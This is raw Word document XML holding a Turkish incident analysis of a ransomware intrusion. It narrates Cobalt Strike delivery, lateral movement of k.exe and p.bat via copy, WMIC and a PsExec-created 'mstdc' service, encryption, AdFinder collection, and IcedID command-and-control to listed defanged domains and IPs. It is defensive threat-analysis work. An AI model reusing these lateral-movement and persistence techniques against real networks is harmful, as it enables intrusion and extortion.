        </w:rPr>
        <w:t>Windows File Explorer kullanarak 1.dll (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6778D307">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>cobal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6778D307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6778D307">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>strike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6778D307">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="51BA2BAB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>saldırgan tarafında transfer edilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FB5D845" w:rsidP="12897420" w:rsidRDefault="2FB5D845" w14:paraId="58369CF2" w14:textId="347CE80F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2FB5D845">
        <w:drawing>
          <wp:inline wp14:editId="3EEFCD63" wp14:anchorId="2BA116FF">
            <wp:extent cx="5724524" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="202573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437e6a9cc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5A260CAA" w14:textId="210AD52D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261EB8D7" w14:textId="6CE31317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77BC873C" w14:textId="546FD446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14807A42" w14:textId="36267E90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4560B1CA" w14:textId="008C1AA6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31AE7D5B" w14:textId="43467DA2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7F762AA1" w14:textId="054E5820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65DA7342" w14:textId="12C5B2A8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2897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="0BE7C61E" w14:textId="1F94C079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</w:p>
    <w:p w:rsidR="19A6DEDF" w:rsidP="12897420" w:rsidRDefault="19A6DEDF" w14:paraId="09573727" w14:textId="62E8B899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19A6DED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Fidye yazılımının kurulumu için kullanılan son dosyalar aynı yöntemle aktarıl</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="641574E5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>ır</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="19A6DED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  <w:t xml:space="preserve"> ve bu, Explorer.EXE tarafından gerçekleştirilen dosya oluşturma kayıt süreci aracılığıyla görülebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="19A6DEDF" w:rsidP="12897420" w:rsidRDefault="19A6DEDF" w14:paraId="729A8B35" w14:textId="0438F8EB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19A6DEDF">
        <w:drawing>
          <wp:inline wp14:editId="660E82F2" wp14:anchorId="6D93EB64">
            <wp:extent cx="4649089" cy="3256684"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1248344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cf868cb803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89" cy="32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3B101" w:rsidP="12897420" w:rsidRDefault="10D3B101" w14:paraId="02193C00" w14:textId="73F2A795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>k.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">, p.bat ve diğer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>batch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>scriptler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="10D3B101">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> önceden sızılmış makineye transfer edil</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="0DF7501D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>mişti.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="786994D6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ağdaki diğer bilgisayarlara </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A27E0E5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A27E0E5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> komutunu kullanarak </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A27E0E5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>k.exe’yi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A27E0E5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> kopyalamaya çalışır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75B29D14" w:rsidP="12897420" w:rsidRDefault="75B29D14" w14:paraId="1A4BE0E4" w14:textId="30BB525D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75B29D14">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu komut düzgünce çalışmayabilir o zaman saldırgan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="75B29D14">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>webshell’den</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="75B29D14">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> WMIC</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="1D55C62C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="1D55C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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Management Instrumentation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="1D55C6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tr-TR"/>
        </w:rPr>
        <w:t>Command-line</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="1D55C62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)</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="75B29D14">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanarak dosyala</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="227F096C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="75B29D14">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>ı kopyalamaya çalışır.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="7549F31D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> WMIC ile sistem bilgileri alınabilir, uzaktaki sistemler üzerinde iş</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="7F0882D2">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>lemler yapılabilir, yerel kullanıcı hesapları yönetilebilir, çalışan işlemleri ve hizmetleri görüntüleyebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="4CC9A778">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0458C919" w:rsidP="12897420" w:rsidRDefault="0458C919" w14:paraId="6E8F2ABF" w14:textId="042DF932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0458C919">
        <w:drawing>
          <wp:inline wp14:editId="4B05319B" wp14:anchorId="4F369AB5">
            <wp:extent cx="6291335" cy="2822130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="294773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6de439a24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335" cy="28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FCAD7" w:rsidP="12897420" w:rsidRDefault="2FEFCAD7" w14:paraId="5B030FB4" w14:textId="6D10B2E0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2FEFCAD7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">p.bat ve k.exe ağdaki bilgisayarlara kopyalandıktan sonra </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3B169497">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">sistem hesabını kullanarak </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="2FEFCAD7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>PsExec.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="2FEFCAD7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">exe otomatik olarak </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="2FEFCAD7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>mstdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="2FEFCAD7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> adında bir servis oluşturuyor. Bu servis p.bat dosyasını çalıştırma</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="5E409489">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>k için kullanılıyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="62A20D27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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="62A20D27">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Mstdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="62A20D27">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> servisi göze batmamak için yine özenle seçilmiş olabilir. P.bat dosyası </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="62A20D27">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>k.exe’yi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="62A20D27">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> çalışt</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="5B1BC4DA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>ırıyor. Bu da sistemi Base64 tabanlı şifreliyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B1BC4DA" w:rsidP="12897420" w:rsidRDefault="5B1BC4DA" w14:paraId="4A21800D" w14:textId="5BD13489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5B1BC4DA">
        <w:drawing>
          <wp:inline wp14:editId="4A74258A" wp14:anchorId="2C51F4E9">
            <wp:extent cx="5724524" cy="876300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1123321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bc2fd3524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CB400" w:rsidP="12897420" w:rsidRDefault="4AFCB400" w14:paraId="3F06410E" w14:textId="67ED5ABC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4AFCB400">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Her makine “.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="4AFCB400">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="4AFCB400">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">” adı altında dosya oluşturur. Dosya adları </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="4AFCB400">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="4AFCB400">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> çalıştırılan ana</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="51AB7FC1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12897420" w:rsidR="4AFCB400">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>makinenin</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="7C56647C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> ismini içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7C56647C" w:rsidP="12897420" w:rsidRDefault="7C56647C" w14:paraId="4667C32D" w14:textId="29C332D1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7C56647C">
        <w:drawing>
          <wp:inline wp14:editId="5B26108E" wp14:anchorId="107CFA3B">
            <wp:extent cx="5724524" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1138479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1a2527285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06ED8B" w:rsidP="12897420" w:rsidRDefault="3A06ED8B" w14:paraId="4D07836B" w14:textId="6ED4637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12897420" w:rsidR="3A06ED8B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COLLECTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A06ED8B" w:rsidP="12897420" w:rsidRDefault="3A06ED8B" w14:paraId="2E0CCE19" w14:textId="6049B5D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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A06ED8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AdFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3A06ED8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 işlemini bitirdikten sonra dosyaları 7-zip ile sıkıştırır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A06ED8B" w:rsidP="12897420" w:rsidRDefault="3A06ED8B" w14:paraId="731338D3" w14:textId="20E9BEFE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3A06ED8B">
        <w:drawing>
          <wp:inline wp14:editId="58114781" wp14:anchorId="4713B1A9">
            <wp:extent cx="4368367" cy="3430732"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87548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26261ba29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367" cy="34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0A763B80" w14:textId="035C7D3D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2DBD9BD8" w14:textId="3D87745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2BD7A917" w:rsidP="12897420" w:rsidRDefault="2BD7A917" w14:paraId="22D38DA7" w14:textId="18419CC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12897420" w:rsidR="2BD7A917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 xml:space="preserve">COMMAND AND CONTROL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2BD7A917" w:rsidP="12897420" w:rsidRDefault="2BD7A917" w14:paraId="1844ACA7" w14:textId="41D1E32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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="2BD7A917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IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="2BD7A917" w:rsidP="12897420" w:rsidRDefault="2BD7A917" w14:paraId="70347710" w14:textId="14275EE7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r w:rsidRPr="12897420" w:rsidR="2BD7A9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Entail.exe (rundll32.exe), templates544.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="2BD7A9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>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="2BD7A9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 başarılı bir </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="24FEBE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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">şekilde çalıştırdıktan sonra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="24FEBE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trentonkaizerfak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="24FEBE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[.]com adresine dışarıya doğru bir bağlantı kurulmuştur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3031A4B9" w:rsidP="12897420" w:rsidRDefault="3031A4B9" w14:paraId="67E40B8F" w14:textId="334DBB5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3031A4B9">
        <w:drawing>
          <wp:inline wp14:editId="19E5E1CC" wp14:anchorId="5BF50426">
            <wp:extent cx="5464750" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="213666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5c14ec4fd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1A4B9" w:rsidP="12897420" w:rsidRDefault="3031A4B9" w14:paraId="096B32B2" w14:textId="1F5EE54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 xml:space="preserve">İndirilen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> dosyası </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>IcedID’nin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> diğer safhasıydı. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>Payloadı</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3031A4B9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> çalıştırdıktan</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="1376A36D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12897420" w:rsidR="1376A36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5.255.103[.]16 adresine başarılı </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="20D2EE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şekilde kurulur.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:left w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:bottom w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:right w:val="single" w:color="EBEBEB" w:sz="6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1209"/>
        <w:gridCol w:w="423"/>
        <w:gridCol w:w="1372"/>
        <w:gridCol w:w="2974"/>
        <w:gridCol w:w="3038"/>
      </w:tblGrid>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="3332B125">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1209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341F8587" w14:textId="2633CD3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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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926B283" w14:textId="202FEF8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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="137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AA9EFF3" w14:textId="40E3D50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Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="297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C1FA458" w14:textId="1F404CF9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Ja3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3038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B4B0C24" w14:textId="02B0E05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Ja3s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="7F8A5434">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1209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25A9724" w14:textId="3B3D978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5.255.103[.]16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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31DEC161" w14:textId="401B429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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="137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3BC1255" w14:textId="3B42266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pikchayola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[.]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pics</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="297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FD3AFC1" w14:textId="25984B51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0e9f5d64349fb13191bc781f81f42e1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3038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190664B" w14:textId="2CB290C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ec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74a5c51106f0419184d0dd08fb05bc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="259DD4D2">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1209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3BF30EEA" w14:textId="3AB2A8C2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5.255.103[.]16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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8C065A6" w14:textId="38A1363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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
